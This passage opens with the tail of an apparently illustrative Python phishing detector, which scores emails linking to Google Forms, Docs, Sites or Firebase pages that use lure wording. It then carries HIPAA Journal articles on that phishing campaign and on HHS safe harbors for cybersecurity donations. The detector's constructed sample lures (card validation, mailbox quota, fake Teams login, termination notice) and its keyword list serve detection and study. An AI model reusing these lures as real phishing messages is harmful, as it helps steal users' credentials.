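    ("google-forms", re.compile(r"^forms\.gle$", re.I), re.compile(r"")),
    ("google-docs", re.compile(r"^docs\.google\.com$", re.I), re.compile(r"^/document/")),
    ("google-sites", re.compile(r"^sites\.google\.com$", re.I), re.compile(r"")),
    ("firebase", re.compile(r"(^|\.)(web\.app|firebaseapp\.com)$", re.I), re.compile(r"")),
]

# Lure vocabulary drawn from the campaign themes described (card validation,
# mailbox quota, Teams/IT login, payroll/HR termination, charity donation).
# Constructed for this example; a production list would be tuned per organisation.
LURE_WORDS = ("validate", "verify", "login", "log in", "sign in", "password",
              "quota", "storage", "payroll", "severance", "terminated", "donat")


def classify_url(url):
    """Return the free-hosting label for url, or None if it is not user-publishable
    Google content. Matching is on the parsed hostname, so a path that merely
    contains 'docs.google.com' on another host is not matched."""
    parsed = urlparse(url.rstrip(".,;)"))
    host = parsed.hostname or ""
    for label, host_re, path_re in FREE_HOSTING:
        if host_re.search(host) and path_re.search(parsed.path or "/"):
            return label
    return None


def extract_urls(text):
    """Pull http(s) URLs out of plain-text body, trimming trailing punctuation."""
    return [u.rstrip(".,;)") for u in URL_RE.findall(text)]


def score_email(email):
    """email: dict with 'from_name', 'from_addr', 'subject', 'body'.
    Returns a verdict with the reasons, so an analyst can see why it fired."""
    text = f"{email['subject']}\n{email['body']}".lower()
    hosted = [(u, lbl) for u in extract_urls(email["body"]) if (lbl := classify_url(u))]
    lures = sorted(w for w in LURE_WORDS if w in text)
    reasons = []
    if hosted:
        reasons.append("link to user-publishable Google hosting: "
                       + ", ".join(sorted({lbl for _, lbl in hosted})))
    if lures:
        reasons.append("lure wording: " + ", ".join(lures))
    verdict = "suspicious" if hosted and lures else "clean"
    return {"verdict": verdict, "reasons": reasons, "hosted_urls": [u for u, _ in hosted]}


# Constructed sample messages modelled on the campaign themes above; not real emails.
SAMPLE_EMAILS = [
    {"name": "amex-lure", "from_name": "American Express", "from_addr": "alerts@mailer.example",
     "subject": "Action required: validate your card",
     "body": "We could not validate your card. Please validate here: "
             "https://docs.google.com/forms/d/e/EXAMPLE-ID/viewform."},
    {"name": "quota-lure", "from_name": "Security Team", "from_addr": "it-security@corp.example",
     "subject": "Mailbox storage quota exceeded",
     "body": "Some emails were not delivered. Log in to release them: "
             "https://mail-recovery-example.web.app/login"},
    {"name": "teams-lure", "from_name": "IT Department", "from_addr": "helpdesk@corp.example",
     "subject": "New Microsoft Teams message",
     "body": "Sign in to view the message: https://sites.google.com/view/example-teams-login"},
    {"name": "hr-termination", "from_name": "HR", "from_addr": "hr@corp.example",
     "subject": "Notice of termination",
     "body": "Your termination and severance details: "
             "https://docs.google.com/document/d/EXAMPLE-ID/edit"},
    {"name": "team-survey", "from_name": "Alice", "from_addr": "alice@corp.example",
     "subject": "Lunch preferences",
     "body": "Please fill in https://forms.gle/EXAMPLE-ID by Friday."},
    {"name": "vendor-newsletter", "from_name": "Vendor", "from_addr": "news@vendor.example",
     "subject": "Sign in to read our latest update",
     "body": "Read it here: https://www.vendor.example/news"},
]


def run_samples(emails=SAMPLE_EMAILS):
    """Verdict per sample; the survey stays clean because it has no lure wording."""
    return {e["name"]: score_email(e)["verdict"] for e in emails}


if __name__ == "__main__":
    for e in SAMPLE_EMAILS:
        result = score_email(e)
        print(f"{e['name']:18} {result['verdict']:10} {'; '.join(result['reasons'])}")
```

The rule is deliberately a scoring signal rather than a block: internal staff legitimately send Google Forms and Docs links, which is exactly why the Armorblox researchers expected no gateway to block them on day zero, so the lure-wording requirement is what keeps the survey sample clean. In a real pipeline this verdict would feed a risk score alongside sender authentication results and the redirect chain behind the Google-hosted page.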

The campaigns range from highly targeted attacks on specific groups of individuals, such as HR and payroll departments, to untargeted large-scale ‘spray and pray’ campaigns to obtain as many credentials as possible, using more general lures.

These campaigns highlight the need for advanced security solutions capable of identifying and blocking phishing emails that abuse legitimate cloud services, and for ongoing security awareness training so that employees can identify the phishing emails that evade their organization's cybersecurity defenses.

The post Free Google Services Abused in Phishing Campaigns appeared first on HIPAA Journal.

HHS Releases Final Rules with Safe Harbors for Cybersecurity Donations

On Friday last week, the Department of Health and Human Services’ Centers for Medicare and Medicaid Services (CMS) and Office of Inspector General (OIG) published final rules that aim to improve the coordination of care and reduce regulatory barriers. Both final rules contain safe harbor provisions that allow hospitals and healthcare delivery systems to donate cybersecurity technology to physician practices.

The CMS released the final version of the 627-page Modernizing and Clarifying the Physician Self-Referral Regulations, commonly called Stark Law, and the OIG finalized revisions to the 1,049-page Safe Harbors Under the Anti-Kickback Statute and Civil Monetary Penalty Rules Regarding Beneficiary Inducements.

Physician practices often have limited resources, which makes it difficult for them to implement solutions to address cybersecurity risks. Without the necessary protections, sensitive healthcare data could be accessed by unauthorized individuals, stolen, deleted, or encrypted by threat actors. Threat actors could also conduct attacks on small physician practices and use them to gain access to the healthcare systems to which they connect.

When the rules were first proposed, commenters emphasized the need for a safe harbor to allow non-abusive, beneficial arrangements between physicians and other healthcare providers, such as donations of cybersecurity solutions to help safeguard the healthcare ecosystem. The CMS first proposed the changes in October 2019 as part of the Regulatory Sprint to Coordinated Care.

The CMS final rule clarifies the Stark Law exceptions concerning donations of electronic health record (EHR) items and services to physicians, expanding the EHR exception to include cybersecurity software and services. A standalone exception has also been introduced for broader cybersecurity donations, including donations of cybersecurity hardware.

“These finalized exceptions provide new flexibility for certain arrangements, such as donations of cybersecurity technology that safeguard the integrity of the healthcare ecosystem, regardless of whether the parties operate in a fee-for-service or value-based payment system,” said the CMS.

The changes recognize the risk of cyberattacks on the healthcare sector and create a safe harbor for donations of cybersecurity technology, related hardware, and services, which will help to ensure that cybersecurity software and hardware are available to healthcare providers of all sizes.

The safe harbor applies to, but is not limited to, “software that provides malware prevention, software security measures to protect endpoints that allow for network access control, business continuity software, data protection and encryption and email traffic filtering.” The exception also covers the “hardware that is necessary and used predominantly to implement, maintain or re-establish cybersecurity” and a broad range of cybersecurity services such as updating and maintaining software and cybersecurity training services. There is no distinction in the rule between locally installed and cloud-based cybersecurity solutions.

Under the cybersecurity exception, recipients are not required to contribute to the cost of the donated cybersecurity technology or services. Under the EHR exception, the cost contribution requirement for donations of EHR items or services is retained.

“It is our position that allowing entities to donate cybersecurity technology and related services to physicians will lead to strengthening of the entire health care ecosystem,” said the HHS.

The final rules are due to be published in the Federal Register on December 2, 2020 and are expected to take effect on January 19, 2021.

The post HHS Releases Final Rules with Safe Harbors for Cybersecurity Donations appeared first on HIPAA Journal.